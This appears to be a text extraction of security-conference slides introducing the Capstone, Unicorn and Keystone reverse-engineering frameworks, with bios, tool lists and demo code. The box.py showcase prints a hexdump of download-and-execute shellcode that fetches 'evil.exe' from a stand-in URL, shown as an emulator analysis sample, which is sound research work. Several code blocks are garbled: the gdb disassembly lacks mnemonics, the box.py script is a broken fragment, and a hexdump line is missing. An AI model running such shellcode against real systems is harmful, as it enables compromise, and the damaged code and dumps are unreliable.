Bio





# Almost Every Weekend

With VN Security since 2009

- CTF player
- Weekend gamer



### Most of the time

Running zxandora.com project.

- Soon
- Very Soon
- Brand New Online Sandbox



### Once a year

Hack in The Box Crew

- Good friends
- CTF CTF and CTF

### About Me



- 2008, Hack In The Box CTF Winner
- 2010, Hack In The Box Speaker, Malaysia
- 2012, Codegate Speaker, Korea
- 2015, VXRL Speaker, Hong Kong
- 2015, HITCON CTF, Prequal Top 10
- 2016, Codegate CTF, Prequal Top 5
- 2016, QCon Speaker, Beijing

- OSX, Local Privilege Escalation
- Code commits to Metasploit 3
- Solution States Stat
- Metasploit module
- Linux Randomization Bypass
- http://www.github.com/xwings/tuya
- Weibo: @kaijern

# vnsecurity.net

### Introduction



### **VN Security**

- Active CTF Player (CLGT)
- Active speaker at conferences
  - Blackhat USA
  - Tetcon
  - Hack In The Box
  - Xcon

- Our Tools
  - PEDA
  - Unicorn / Capstone / Keystone
  - Xandora
  - OllyDbg, Catcha!
  - ROPEME

### Nations

- Vietnamese
- Malaysian
- Singaporean

### Nguyen Anh Quynh

- Security Researcher
- Active speaker at conferences
  - Blackhat USA
  - Syscan
  - Hack In The Box
  - Xcon

- Research Topics
  - Emulators
  - Virtualization
  - Binary Analysis
  - Tools for Malware Analysis

### When gdb meets peda

#### **GDB**

```
(gdb) disassemble
Dump of assembler code for function main:
0x000000000040058c <main+0>:    push   %rbp
0x000000000040058d <main+1>:           %rsp,%rbp
0x0000000000400590 <main+4>:           $0x10,%rsp
0x0000000000400594 <main+8>:           $0x4,%edi
0x0000000000400599 <main+13>:   callq  0x4004a8 <_init+56>
0x000000000040059e <main+18>:          %rax,0xffffffffffffff(%rbp)
0x00000000004005a2 <main+22>:          $0x0,0xfffffffffffffffc(%rbp)
0x00000000004005a9 <main+29>:          0xfffffffffffffffc(%rbp),%eax
0x00000000004005ac <main+32>:
0x00000000004005ae <main+34>:          $0x2,%rax
0x00000000004005b2 <main+38>:          %rax,%rdx
0x00000000004005b5 <main+41>:          0xffffffffffffff(%rbp),%rdx
0x00000000004005b9 <main+45>:          0xfffffffffffffffc(%rbp),%eax
0x00000000004005bc <main+48>:          %eax,(%rdx)
0x00000000004005be <main+50>:          0xfffffffffffffffc(%rbp),%eax
0x00000000004005c1 <main+53>:
0x00000000004005c3 <main+55>:   shl    $0x2,%rax
0x00000000004005c7 <main+59>:          0xffffffffffffff(%rbp),%rax
0x00000000004005cb <main+63>:          (%rax),%edx
0x00000000004005cd <main+65>:          0xfffffffffffffffc(%rbp),%esi
0x00000000004005d0 <main+68>:          $0x4006dc,%edi
0x00000000004005d5 <main+73>:          $0x0,%eax
0x00000000004005da <main+78>:   callq  0x4004b8 <_init+72>
0x00000000004005df <main+83>:          $0x1,0xfffffffffffffffc(%rbp)
0x00000000004005e3 <main+87>:          0x4005a9 <main+29>
End of assembler dump.
(gdb)
```



#### PEDA

```
gdb-peda$ start
EAX: 0xbffff7f4 --> 0xbffff916 ("/root/a.out")
EBX: 0xb7fcbff4 --> 0x155d7c
ECX: 0xd5eeaa03
EDX: 0x1
ESI: 0x0
EDI: 0x0
EBP: 0xbffff748 --> 0xbffff7c8 --> 0x0
ESP: 0xbffff748 --> 0xbffff7c8 --> 0x0
EIP: 0x80483e7 (<main+3>: and esp,0xfffffff0)
EFLAGS: 0x200246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0x80483e3 <frame_dummy+35>: nop
   0x80483e4 <main>:
   0x80483e5 <main+1>:  mov
=> 0x80483e7 <main+3>:  and    esp,0xfffffff0
   0x80483ea <main+6>:  sub    esp,0x110
   0x80483f0 <main+12>: mov    eax,DWORD PTR [ebp+0xc]
   0x80483f3 <main+15>: add    eax,0x4
   0x80483f6 <main+18>: mov    eax,DWORD PTR [eax]
0000| 0xbffff748 --> 0xbffff7c8 --> 0x0
0004| 0xbffff74c --> 0xb7e8cbd6 (<__libc_start_main+230>: DWORD PTR [6
0008| 0xbffff750 --> 0x1
0012| 0xbffff754 --> 0xbffff7f4 --> 0xbffff916 ("/root/a.out")
0016| 0xbffff758 --> 0xbffff7fc --> 0xbffff922 ("SHELL=/bin/bash")
0020| 0xbffff75c --> 0xb7fe1858 --> 0xb7e76000 --> 0x464c457f
0024| 0xbffff760 --> 0xbffff7b0 --> 0x0
0028| 0xbffff764 --> 0xffffffff
Legend: code, data, rodata, value
Temporary breakpoint 1, 0x080483e7 in main ()
```

# Why KCON

### Fake Websites





# What Are These Things

### What Is Disassembler





- Translates binary (machine code) into assembly code
- Core component of binary analysis, reverse engineering, debugging and exploit development tools
- A disassembly framework (engine/library) is a lower layer in the architecture stack

#### **Example**

- 01D8 = ADD EAX,EBX (x86)
- 1160 = STR R1,[R2] (ARM's Thumb)
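
To make the x86 example concrete, here is a minimal sketch of what a disassembler does for this single instruction form. It is not how Capstone is implemented; the helper name `disasm_add_rr` is hypothetical, and it only handles opcode `0x01` (`ADD r/m32, r32`) with register-direct operands.

```python
# Toy decoder for one x86 instruction form: ADD r/m32, r32 (opcode 0x01)
# with a register-direct ModRM byte (mod == 0b11). Illustration only.
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def disasm_add_rr(code: bytes) -> str:
    """Decode a 2-byte `ADD r/m32, r32` instruction (hypothetical helper)."""
    if len(code) < 2 or code[0] != 0x01:
        raise ValueError("only opcode 0x01 (ADD r/m32, r32) is handled")
    modrm = code[1]
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if mod != 0b11:
        raise ValueError("only register-direct operands are handled")
    # The r/m field names the destination, the reg field names the source.
    return "add %s, %s" % (REG32[rm], REG32[reg])


print(disasm_add_rr(bytes.fromhex("01d8")))  # add eax, ebx
```

A real engine has to cover prefixes, memory operands and thousands of opcodes, which is why this work belongs in a shared framework.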



### What Is Emulator



- Software-only CPU emulator
- Core focus is on CPU operations
- Designed without machine devices
- Safe emulation environment
- Where else do we see a CPU emulator? In antivirus engines

#### **Example**

- 01D8 = add eax,ebx (x86)
  - Load the eax & ebx registers
  - Add the values of eax & ebx, then copy the result to eax
  - Update the flags OF, SF, ZF, AF, CF, PF accordingly
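
The three steps above can be sketched in a few lines of Python. This is only an illustration of the semantics of a 32-bit `add`, not Unicorn's implementation; the function name `emulate_add` and the dictionary-based register file are assumptions made for the example.

```python
MASK32 = 0xFFFFFFFF


def emulate_add(regs: dict, dst: str, src: str) -> dict:
    """Emulate `add dst, src` on 32-bit registers and return the new flags."""
    a, b = regs[dst] & MASK32, regs[src] & MASK32    # load both registers
    full = a + b
    res = full & MASK32
    regs[dst] = res                                  # copy the result to dst
    return {
        "CF": int(full > MASK32),                        # unsigned carry out of bit 31
        "PF": int(bin(res & 0xFF).count("1") % 2 == 0),  # even parity of the low byte
        "AF": int(((a ^ b ^ res) & 0x10) != 0),          # carry out of bit 3
        "ZF": int(res == 0),
        "SF": res >> 31,
        "OF": int(((a ^ res) & (b ^ res) & 0x80000000) != 0),  # signed overflow
    }


regs = {"eax": 0x7FFFFFFF, "ebx": 0x1}
flags = emulate_add(regs, "eax", "ebx")
print(hex(regs["eax"]), flags)
```

With these inputs the signed result overflows, so OF and SF are set while CF stays clear.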



### What Is Assembler



- Translates assembly into machine code
- Supports high-level concepts such as macros and functions
- Dynamic machine code generation

#### **Example**

- ADD EAX,EBX = 01D8 (x86)
- STR R1,[R2] = 1160 (ARM's Thumb)
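
The reverse direction can be sketched the same way. The snippet below is a toy, not Keystone: `asm_add_rr` is a hypothetical helper that only accepts `add <reg32>, <reg32>` and encodes it with opcode `0x01` plus a register-direct ModRM byte.

```python
import re

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def asm_add_rr(text: str) -> bytes:
    """Assemble `add dst, src` for 32-bit registers (hypothetical helper)."""
    m = re.fullmatch(r"\s*add\s+(\w+)\s*,\s*(\w+)\s*", text.lower())
    if not m or m.group(1) not in REG32 or m.group(2) not in REG32:
        raise ValueError("unsupported statement: %r" % text)
    dst, src = REG32.index(m.group(1)), REG32.index(m.group(2))
    # ModRM: mod=11 (register direct), reg=source, r/m=destination
    modrm = 0xC0 | (src << 3) | dst
    return bytes([0x01, modrm])


print(asm_add_rr("ADD EAX,EBX").hex())  # 01d8
```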



# Where are we currently





- CEnigma
- Unicorn
- Cerbero Profiler
- Shwass
- CryptoShark
- Rekall
- Nrop
- CEbot
- Ropper
- Inficere
- Qira
- lldb-capstone-arm
- Camal
- Snowman
- Pwntools
- Capstone-js
- Radare2
- X86dbg
- Bokken
- ELF Unstrip Tool
- Pyew
- Concolica
- Webkitties
- Binjitsu
- WinAppDbg
- Memtools Vita
- Malware\_config\_parsers
- Nightmare
- Rop-tool
- PowerSploit
- BARF
- JitAsm
- OllyCapstone
- MachOview
- rp++
- Catfish
- PackerId
- RopShell
- Binwalk
- Vitasploit
- Volatility Plugins
- ROPgadget
- The-Backdoor-Factory
- Xipiter Toolkit
- MPRESS dumper
- PowerShellArsenal
- JSoS-Module-Dump
- Pwndbg
- Frida
- Sonare
- PyReil
- Lisa.py
- Cuckoo
- PyDA
- ARMSCGen
- Many more





- UniDOS: Microsoft DOS emulator.
- Radare2: Unix-like reverse engineering framework and command-line tools.
- Usercorn: User-space system emulator.
- Unicorn-decoder: A shellcode decoder that can dump self-modifying code.
- Univm: A plugin for x64dbg for x86 emulation.
- PyAna: Analyzing Windows shellcode.
- GEF: GDB Enhanced Features.
- Pwndbg: A Python plugin for GDB to assist exploit development.
- Eli.Decode: Decode obfuscated shellcode.
- IdaEmu: An IDA Pro plugin for code emulation.

- Roper: Build ROP-chain attacks on a target binary using genetic algorithms.
- Sk3wlDbg: A plugin for IDA Pro for machine code emulation.
- Angr: A framework for static & dynamic concolic (symbolic) analysis.
- Cemu: Cheap EMUlator based on the Keystone and Unicorn engines.
- ROPMEMU: Analyze ROP-based exploitation.
- BroIDS\_Unicorn: Plugin to detect shellcode on Bro IDS with Unicorn.
- UniAna: Analyze PE files or shellcode (Windows x86 only).
- ARMSCGen: ARM Shellcode Generator.
- TinyAntivirus: Open-source antivirus engine designed for detecting & disinfecting polymorphic viruses.
- Patchkit: A powerful binary patching toolkit.





- Keypatch: IDA Pro plugin for code assembling & binary patching.
- Radare2: Unix-like reverse engineering framework and command-line tools.
- GEF: GDB Enhanced Features.
- Ropper: ROP gadget and binary information tool.
- Cemu: Cheap EMUlator based on the Keystone and Unicorn engines.
- Pwnypack: Certified Edible Dinosaurs official CTF toolkit.
- Keystone.JS: Emscripten port of Keystone for JavaScript.
- Usercorn: Versatile kernel+system+userspace emulator.
- x64dbg: An open-source x64/x32 debugger for Windows.
- Liberation: A next-generation code injection library for iOS cheaters everywhere.

- Strongdb: GDB plugin for Android debugging.
- AssemblyBot: Telegram bot for assembling and disassembling on the go.
- demovfuscator: Deobfuscator for movfuscated binaries.
- Dash: A simple web-based tool for working with assembly language.
- ARMSCGen: ARM Shellcode Generator.
- Asm\_Ops: Assembler for IDA Pro (IDA plugin).
- Binch: A lightweight ELF binary patch tool.
- Metame: Metamorphic code engine for arbitrary executables.
- Patchkit: A powerful binary patching toolkit.
- Pymetamorph: Metamorphic engine in Python for Windows executables.

# Born of The Trinity

# Fundamental Frameworks for Reversing

- The components of a complete RE framework
- Interchange between assembler and disassembler
- A full CPU emulator always helps when dealing with obfuscated code



# Capstone Engine

NGUYEN Anh Quynh <aquynh -at- gmail.com>

http://www.capstone-engine.org

# What's Wrong with Current Disassembler



| Features               | Distorm3           | BeaEngine | Udis86 | Libopcode          |
|------------------------|--------------------|-----------|--------|--------------------|
| X86 / Arm              | √ / X              | √ / X     | √ / X  | √ / √ <sup>1</sup> |
| Linux / Windows        | √ / √              | √ / √     | √ / √  | √ / X              |
| Python / Ruby bindings | √ / X <sup>2</sup> | √ / X     | √ / X  | √ / X              |
| Update                 | X                  | ?         | X      | X                  |
| License                | GPL                | LGPL3     | BSD    | GPL                |

- Nothing worked well enough, even as late as 2013 (the first release of Capstone Engine)
- No one seemed to be taking charge
- The industry stayed in the dark

### What do we need?

- Multiple architectures: x86, ARM, ARM64, Mips, PPC and more
- Multiple platforms: Windows, Linux, OSX and more
- Multiple bindings: Python, Ruby, Java, C# and more
- Clean, simple, intuitive & architecture-neutral API
- Provides a detailed breakdown of each instruction
- Friendly license: not GPL

### Lots of Work!



- Multiple architectures: x86, ARM
- Actively maintained & kept up to date with the latest architecture changes
- Multiple platforms: Windows, Linux
- Understanding opcodes: Intel x86 alone has 1500+ documented instructions
- Support Python and Ruby as binding languages
- One-man show
- Target: finish within 12 months

### A Good Disassembler

- Multiple architectures: x86, ARM
- Actively maintained & kept up to date with the latest architecture changes
- Multiple platforms: Windows, Linux
- Supports Python and Ruby as binding languages
- Friendly license: BSD
- Easy to set up

# Not Reinventing the Wheel





- LLVM: an open-source compiler project
- Sets of modules for representing, compiling and optimizing machine code
- Backed by many major players: AMD, Apple, Google, Intel, IBM, ARM, Imgtec, Nvidia, Qualcomm, Samsung, etc.
- An incredibly large (compiler) community around it

### Fork from LLVM







- Multiple architectures ready
- Built-in disassembler (MC module)
  - Built only, only and only for LLVM
  - Actively maintained by the vendors behind each architecture (e.g. x86 by Intel)
- Very actively maintained & updated by a huge community





#### Issues

- Cannot just reuse MC as-is without huge effort.
  - LLVM code is in C++, but we want C code.
  - Code is mixed like spaghetti with lots of LLVM layers, so it is not easy to extract.
  - Need to build the instruction breakdown details ourselves.
  - Need to expose semantics to the API.
  - Not designed to be thread-safe.
  - Poor Windows support.
- Need to build all bindings ourselves.
- Need to keep up with upstream code once we fork LLVM and maintain it ourselves.

#### **Solutions**

- Fork LLVM, but remove everything we do not need
- Replicate LLVM's MC
  - Build around MC without changing MC
  - Replace C++ with C
- Extend LLVM's MC
  - Isolate global variables to ensure thread safety
- Take semantic information from LLVM's TD files
- cs\_insn structure
  - Keeps all information, nicely grouped
  - Makes sure the API is architecture-independent

### Capstone is not LLVM



### **More Advantages**

- Zero dependencies
- Compact in size
- More than assembly code
- Thread-safe design
- Can be embedded into restricted firmware / OS environments
- Malware resistance (x86)
- Optimized for reverse engineers
- More hardware modes supported: big-endian for ARM and ARM64
- More instructions supported: 3DNow (x86)

#### **More Robust**

- Cannot always rely on LLVM to fix bugs
  - The disassembler is still considered second-class in LLVM, especially when a bug does not affect code generation
  - LLVM may refuse to fix bugs in code the LLVM backend never generates (tricky x86 code)
- But handling all corner cases properly is Capstone's first priority
  - Handles all the x86 malware tricks we are aware of
  - LLVM could not care less

### Demo



```
/* test1.c */
#include <stdio.h>
#include <inttypes.h>

#include <capstone/capstone.h>

#define CODE "\x55\x48\x8b\x05\xb8\x13\x00\x00"

int main(void)
{
    csh handle;
    cs_insn *insn;
    size_t count;

    if (cs_open(CS_ARCH_X86, CS_MODE_64, &handle) != CS_ERR_OK)
        return -1;
    /* disassemble all instructions in CODE, starting at address 0x1000 */
    count = cs_disasm(handle, (const uint8_t *)CODE, sizeof(CODE) - 1, 0x1000, 0, &insn);
    if (count > 0) {
        size_t j;
        for (j = 0; j < count; j++) {
            printf("0x%"PRIx64":\t%s\t\t%s\n", insn[j].address, insn[j].mnemonic,
                   insn[j].op_str);
        }

        cs_free(insn, count);
    } else
        printf("ERROR: Failed to disassemble given code!\n");

    cs_close(&handle);

    return 0;
}
```

```
# test1.py
from capstone import *

CODE = b"\x55\x48\x8b\x05\xb8\x13\x00\x00"

md = Cs(CS_ARCH_X86, CS_MODE_64)
for i in md.disasm(CODE, 0x1000):
    print("0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str))
```

```
$ python test1.py
0x1000: push    rbp
0x1001: mov     rax, qword ptr [rip + 0x13b8]
```

### Showcase: x64dbg







# Unicorn Engine

NGUYEN Anh Quynh <aquynh -at- gmail.com> DANG Hoang Vu <danghvu -at- gmail.com>

http://www.unicorn-engine.org

# What's Wrong with Current Emulator



| Features    | libemu         | PyEmu          | IDA-x86emu     | libCPU         |
|-------------|----------------|----------------|----------------|----------------|
| Multi-arch  | X              | X              | X              | X <sup>1</sup> |
| Updated     | X              | X              | X              | X              |
| Independent | X <sup>2</sup> | X <sup>3</sup> | X <sup>4</sup> | √              |
| JIT         | X              | X              | X              | √              |

- Nothing worked well enough, even as late as 2015 (the first release of Unicorn Engine)
- Limited bindings
- Limited functions, limited architectures

### What Do We Need?



| Features    | libemu | PyEmu | IDA-x86emu | libCPU | Unicorn |
|-------------|--------|-------|------------|--------|---------|
| Multi-arch  | X      | X     | X          | X      | **√**   |
| Updated     | X      | X     | X          | X      | **√**   |
| Independent | X      | X     | X          | **√**  | **√**   |
| JIT         | X      | X     | X          | **√**  | **√**   |

- Multiple architectures: x86, x86\_64, ARM, ARM64, Mips, PPC
- Multiple platforms: Windows, Linux, OSX, Android and more
- Multiple bindings: Python, Ruby, Java, C# and more
- Pure C implementation
- Latest, up-to-date architecture support
- Uses JIT compiler techniques
- Instrumentation, e.g. F7, F8

### Lots of Work!



- Multiple architectures: x86, ARM
- Actively maintained & kept up to date with the latest architecture changes
- Multiple platforms: Windows, Linux
- Understanding opcodes: Intel x86 alone has 1500+ documented instructions
- Support Python and Ruby as binding languages
- One-man show
- Target: finish within 12 months

### A Good Emulator



- Multiple architectures: x86, x86\_64, ARM, ARM64, Mips and more
- Actively maintained & kept up to date with the latest architecture changes
- Multiple platforms: Windows, Linux, OSX, Android and more
- Code in pure C
- Supports Python and Ruby as binding languages
- JIT compiler technique
- Instrumentation at various levels
  - Single step
  - Instruction
  - Memory access

# Not Reinventing the Wheel





- QEMU: an open-source system emulator project
- Very large and highly active community
- Multiple architectures: x86, ARM, ARM64, Mips, PowerPC, Sparc, etc. (18 architectures)
- Multiple platforms: \*nix and Windows

### Fork from QEMU







- Supports all kinds of architectures and is kept very up to date
- Already implemented in pure C, so it is easy to implement the Unicorn core on top
- Already supports JIT in CPU emulation, with optimizations on top of the JIT
- Are we done?



#### Issues 1

- QEMU does not just emulate the CPU, but also device models & ROM/BIOS, to fully emulate physical machines
- The QEMU codebase is huge and mixed like spaghetti
- Difficult to read, as it was contributed by many different people

#### **Solutions**

- Keep only the CPU emulation code & remove everything else (devices, ROM/BIOS, migration, etc.)
- Keep the supporting subsystems such as QObject and QOM
- Rewrite some components but keep the CPU emulation code intact (so it is easy to sync with QEMU in the future)

#### Issues 2

- QEMU is a set of emulators, one per architecture
  - Independently built at compile time
  - All architectures' code shares a lot of internal data structures and global variables
- Unicorn wants a single emulator that supports all architectures

#### **Solutions**

- Isolated common variables & structures
  - Ensured thread safety by design
- Refactored to allow multiple instances of Unicorn at the same time
- Modified the build system to support multiple architectures on demand
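
The idea of moving shared globals into a per-instance context can be illustrated with a toy handle object. This is a sketch of the design principle only; the class `ToyEngine` and its methods are hypothetical and do not mirror Unicorn's internals.

```python
class ToyEngine:
    """Hypothetical emulator handle: all state lives on the instance,
    never in module-level globals, so instances cannot interfere."""

    def __init__(self, arch: str):
        self.arch = arch
        self.regs = {}   # per-instance register file
        self.mem = {}    # per-instance memory map

    def reg_write(self, name: str, value: int) -> None:
        self.regs[name] = value

    def reg_read(self, name: str) -> int:
        return self.regs.get(name, 0)


# Two engines for different architectures coexist in one process.
x86 = ToyEngine("x86")
arm = ToyEngine("arm")
x86.reg_write("ecx", 0x1234)
arm.reg_write("r0", 0x7890)
print(hex(x86.reg_read("ecx")), hex(arm.reg_read("r0")), arm.reg_read("ecx"))
```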


#### Issues 3

- Instrumentation for static compilation only
- The JIT optimizes for performance with lots of fast-path tricks, making code instrumentation extremely hard

#### **Solutions**

- Build a dynamic, fine-grained instrumentation layer from scratch
- Support various levels of instrumentation
  - Single-step or on a particular instruction (TCG level)
  - Instrumentation of memory accesses (TLB level)
  - Dynamically read and write registers
  - Handle exceptions, interrupts and syscalls (arch level) through user-provided callbacks
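
Instruction-level instrumentation through user callbacks can be sketched with a toy interpreter. This is not Unicorn code: `ToyX86` and `hook_code` are hypothetical names, and the interpreter only understands the two one-byte opcodes `0x41` (`inc ecx`) and `0x4a` (`dec edx`).

```python
class ToyX86:
    """Toy interpreter for two 1-byte x86 opcodes: 0x41 (inc ecx), 0x4a (dec edx)."""

    def __init__(self):
        self.regs = {"ecx": 0, "edx": 0}
        self.code_hooks = []

    def hook_code(self, callback):
        # callback(engine, address, size) is called before each instruction
        self.code_hooks.append(callback)

    def run(self, code: bytes, address: int):
        for offset, opcode in enumerate(code):
            for cb in self.code_hooks:
                cb(self, address + offset, 1)
            if opcode == 0x41:
                self.regs["ecx"] = (self.regs["ecx"] + 1) & 0xFFFFFFFF
            elif opcode == 0x4A:
                self.regs["edx"] = (self.regs["edx"] - 1) & 0xFFFFFFFF
            else:
                raise ValueError("unsupported opcode 0x%02x" % opcode)


trace = []
emu = ToyX86()
emu.regs.update(ecx=0x1234, edx=0x7890)
# Record the address and a snapshot of the registers at every step.
emu.hook_code(lambda e, addr, size: trace.append((addr, dict(e.regs))))
emu.run(b"\x41\x4a", 0x1000000)
print([hex(addr) for addr, _ in trace], emu.regs)
```

Because the hook sees every instruction before it executes, a debugger-style single step or an execution trace can be built on top of it without touching the interpreter loop.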

#### Issues 4

- Objects are allocated (malloc) everywhere without being properly freed
- Fine for a tool, but unacceptable for a framework

#### **Solutions**

- Find and fix all the memory leaks
- Refactor various subsystems to keep track of and clean up dangling pointers

#### Unicorn Engine is not QEMU





- Independent framework
- Much more compact in size, lightweight in memory
- Thread-safe, with multiple architectures supported in a single binary
- Provides an interface for dynamic instrumentation
- More resistant to exploitation (more secure)
  - The CPU emulation component has never been exploited!
  - Easy to test and fuzz as an API.

#### Demo

```
#include <stdio.h>
#include <unicorn/unicorn.h>

// code to be emulated
#define X86_CODE32 "\x41\x4a" // INC ecx; DEC edx

// memory address where emulation starts
#define ADDRESS 0x1000000

int main(int argc, char **argv, char **envp)
{
    uc_engine *uc;
    uc_err err;
    int r_ecx = 0x1234;     // ECX register
    int r_edx = 0x7890;     // EDX register

    printf("Emulate i386 code\n");

    // Initialize emulator in X86-32bit mode
    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
    if (err != UC_ERR_OK) {
        printf("Failed on uc_open() with error returned: %u\n", err);
        return -1;
    }

    // map 2MB memory for this emulation
    uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

    // write machine code to be emulated to memory
    if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) {
        printf("Failed to write emulation code to memory, quit!\n");
        return -1;
    }

    // initialize machine registers
    uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx);
    uc_reg_write(uc, UC_X86_REG_EDX, &r_edx);

    // emulate code in infinite time & unlimited instructions
    err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0);
    if (err) {
        printf("Failed on uc_emu_start() with error returned %u: %s\n",
               err, uc_strerror(err));
    }

    // now print out some registers
    printf("Emulation done. Below is the CPU context\n");

    uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx);
    uc_reg_read(uc, UC_X86_REG_EDX, &r_edx);
    printf(">>> ECX = 0x%x\n", r_ecx);
    printf(">>> EDX = 0x%x\n", r_edx);

    uc_close(uc);

    return 0;
}
```

```
% make
cc test1.c -L/usr/local/Cellar/glib/2.44.1/lib -L/usr/local/opt/gettext/2
% ./test1
Emulate i386 code
Emulation done. Below is the CPU context
>>> ECX = 0x1235
>>> EDX = 0x788f


```
from __future__ import print_function
from unicorn import *
from unicorn.x86_const import *

# code to be emulated
X86_CODE32 = b"\x41\x4a" # INC ecx; DEC edx

# memory address where emulation starts
ADDRESS = 0x1000000

print("Emulate i386 code")
try:
    # Initialize emulator in X86-32bit mode
    mu = Uc(UC_ARCH_X86, UC_MODE_32)

    # map 2MB memory for this emulation
    mu.mem_map(ADDRESS, 2 * 1024 * 1024)

    # write machine code to be emulated to memory
    mu.mem_write(ADDRESS, X86_CODE32)

    # initialize machine registers
    mu.reg_write(UC_X86_REG_ECX, 0x1234)
    mu.reg_write(UC_X86_REG_EDX, 0x7890)

    # emulate code in infinite time & unlimited instructions
    mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32))

    # now print out some registers
    print("Emulation done. Below is the CPU context")

    r_ecx = mu.reg_read(UC_X86_REG_ECX)
    r_edx = mu.reg_read(UC_X86_REG_EDX)
    print(">>> ECX = 0x%x" % r_ecx)
    print(">>> EDX = 0x%x" % r_edx)

except UcError as e:
    print("ERROR: %s" % e)
```

```
$ python test1.py
Emulate i386 code
Emulation done. Below is the CPU context
>>> ECX = 0x1235
>>> EDX = 0x788f
```

#### Showcase: box.py

```
(20:54:08):xwings@kali32:<~/box>
(4)$ hexdump -C samples/UrlDownloadToFile.sc
00000000  50 90 50 90 50 90 50 90  90 90 90 90 90 90 90 90  |P.P.P.P.........|
00000010  e9 fb 00 00 00 5f 64 a1  30 00 00 00 8b 40 0c 8b  |....._d.0....@..|
00000020  70 1c ad 8b 68 20 80 7d  0c 33 74 03 96 eb f3 8b  |p...h .}.3t.....|
00000030  68 08 8b f7 6a 04 59 e8  8f 00 00 00 e2 f9 68 6f  |h...j.Y.......ho|
00000040  6e 00 00 68 75 72 6c 6d  54 ff 16 8b e8 e8 79 00  |n..hurlmT.....y.|
00000050  00 00 8b d7 47 80 3f 00  75 fa 47 57 47 80 3f 00  |....G.?.u.GWG.?.|
00000060  75 fa 8b ef 5f 33 c9 81  ec 04 01 00 00 8b dc 51  |u..._3.........Q|
00000070  52 53 68 04 01 00 00 ff  56 0c 5a 59 51 52 8b 02  |RSh.....V.ZYQR..|
00000080  53 43 80 3b 00 75 fa 81  7b fc 2e 65 78 65 75 03  |SC.;.u..{..exeu.|
00000090  83 eb 08 89 03 c7 43 04  2e 65 78 65 c6 43 08 00  |......C..exe.C..|
000000a0  5b 8a c1 04 30 88 45 00  33 c0 50 50 53 57 50 ff  |[...0.E.3.PPSWP.|
000000b0  56 10 83 f8 00 75 06 6a  01 53 ff 56 04 5a 59 83  |V....u.j.S.V.ZY.|
000000c0  c2 04 41 80 3a 00 75 b4  ff 56 08 51 56 8b 75 3c  |..A.:.u..V.QV.u<|
000000d0  8b 74 35 78 03 f5 56 8b  76 20 03 f5 33 c9 49 41  |.t5x..V.v ..3.IA|
000000e0  ad 03 c5 33 db 0f be 10  38 f2 74 08 c1 cb 0d 03  |...3....8.t.....|
000000f0  da 40 eb f1 3b 1f 75 e7  5e 8b 5e 24 03 dd 66 8b  |.@..;.u.^.^$..f.|
00000110  e8 00 ff ff ff 8e 4e 0e  ec 98 fe 8a 0e 7e d8 e2  |......N......~..|
00000120  73 33 ca 8a 5b 36 1a 2f  70 64 45 62 57 00 68 74  |s3..[6./pdEbW.ht|
00000130  74 70 3a 2f 2f 62 6c 61  68 62 6c 61 68 2e 63 6f  |tp://blahblah.co|
00000140  6d 2f 65 76 69 6c 2e 65  78 65 00 00 00 00 00 00  |m/evil.exe......|
00000150
```



```
f = open(fname, 'rb')
def disas(code, address):
  md = Cs(CS_ARCH_X86, CS_MODE_32)
  insn = md.disasm(str(code), address)
      print('0x%x:\t%s\t%s' % (i.address, i.mnemonic, i.op_str))
       disas(code, address)
  esp = uc.reg_read(UC_X86_REG_ESP)
  print(">> ERROR: unmapped memory access at 0x%x" % addr)
  usage = "Usage: %prog [options] filename"
parser = OptionParser(usage)
                    action="store_true", dest="debug")
  (options, args) = parser.parse_args()
       uc = Uc(UC_ARCH_X86, UC_MODE_32)
       uc.hook_add(UC_HOOK_MEM_UNMAPPED, hook_mem_error)
       uc.reg_write(UC_X86_REG_ESP, STACK_ADDR + 0x3000)
       uc.reg_write(UC_X86_REG_EBP, STACK_ADDR + 0x3000)
       uc.mem_map(CODE_ADDR, CODE_SIZE)
       uc.mem_write(CODE_ADDR, shellcode)
       setup_gdt_segment(uc, GDT_ADDR, GDT_LIMIT, UC_X86_REG_FS, 1, FS_ADDR, FS_SIZE, init = True)
       setup_win32_xp(uc, FS_ADDR)
```

# Keystone Engine

NGUYEN Anh Quynh <aquynh -at- gmail.com>

http://www.keystone-engine.org

#### What's Wrong with Assembler





- Nothing is up to our standard, even in 2016!
  - Yasm: X86 only, no longer updated
  - Intel XED: X86 only, misses many instructions & is closed-source
  - Using an assembler to generate object files
  - What about other important architectures: Arm, Arm64, Mips, PPC, Sparc, etc.?

#### What do we need?



- Multiple architectures: x86, ARM, ARM64, Mips, PPC and more
- Multiple platforms: Windows, Linux, OSX and more
- Multiple bindings: Python, Ruby, Java, C# and more
- Clean, simple, intuitive & architecture-neutral API
- Provides a detailed breakdown of each instruction
- Friendly license: BSD

#### Lots of Work!



- Multiple architectures: x86, ARM
- Actively maintained & kept up to date with the latest architecture changes
- Multiple platforms: Windows, Linux
- Understanding opcodes: Intel x86 alone has 1500+ documented instructions
- Support Python and Ruby as binding languages
- One-man show
- Target: finish within 12 months

#### A Good Assembler



- Multiple architectures: x86, ARM
- Actively maintained & kept up to date with the latest architecture changes
- Multiple platforms: Windows, Linux
- Supports Python and Ruby as binding languages
- Friendly license (BSD)
- Easy to set up

#### Not Reinventing the Wheel





- LLVM: an open-source compiler project
- Sets of modules for representing, compiling and optimizing machine code
- Backed by many major players: AMD, Apple, Google, Intel, IBM, ARM, Imgtec, Nvidia, Qualcomm, Samsung, etc.
- An incredibly large (compiler) community around it

#### Fork from LLVM







- Multiple architectures ready
- Built-in assembler (MC module)
  - Built only, only and only for LLVM
  - Actively maintained
- Very actively maintained & updated by a huge community



#### Issue 1

- LLVM is not just an assembler, but also a disassembler, bitcode, InstPrinter, linker, optimization, etc.
- The LLVM codebase is huge and mixed like spaghetti

#### **Solutions**

- Keep only the assembler code & remove everything unrelated
